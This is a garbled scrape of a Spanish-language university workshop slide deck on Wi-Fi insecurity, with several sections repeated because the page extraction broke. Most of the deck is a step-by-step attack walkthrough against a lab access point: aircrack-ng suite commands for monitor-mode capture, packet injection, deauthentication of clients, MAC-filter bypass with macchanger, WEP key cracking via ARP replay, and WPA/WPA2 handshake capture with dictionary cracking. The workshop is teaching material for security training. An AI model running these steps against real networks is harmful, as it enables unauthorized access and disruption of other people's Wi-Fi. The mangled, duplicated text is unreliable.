7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 43: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 44: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 45: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

